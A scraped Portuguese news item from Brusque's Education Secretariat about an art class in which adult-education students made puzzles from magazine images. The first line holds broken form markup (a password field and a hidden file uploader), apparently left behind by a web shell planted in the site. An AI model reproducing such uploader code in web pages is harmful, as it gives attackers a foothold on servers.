POST>PASSWORD: CHECKBOX NAME="F[]" VALUE=" "_upl" value="Upload" name="uploader" id="uploader" AULA DE ARTE PROMOVE DESAFIO AOS ALUNOS DA EJA VOLTA GRANDE – Secretaria de Educação de Brusque
Weather:
HomeEJAAULA DE ARTE PROMOVE DESAFIO AOS ALUNOS DA EJA VOLTA GRANDE

AULA DE ARTE PROMOVE DESAFIO AOS ALUNOS DA EJA VOLTA GRANDE

Nesta terça-feira (11), a atividade desenvolvida pelo professor Renato Horner promoveu um desafio na aula de Arte. A proposta desenvolvida com os alunos da comunidade Volta Grande foi a elaboração de um quebra-cabeça partindo de imagens selecionadas em revistas buscando elementos da arte como pôster de filmes, cultura Indiana, vitrais de igreja, entre outros temas.
Na apresentação dos trabalhos, Renato destaca as situações que ocorreram durante a criação do jogo como buscar o equilíbrio, trabalhar a paciência, a cooperação e concentração. Além disso, os alunos conheceram elementos que encontramos em algumas “religiões” como: Taoísmo e Confucionismo relacionando a atividade com a disciplina de Cultura e História das Religiões.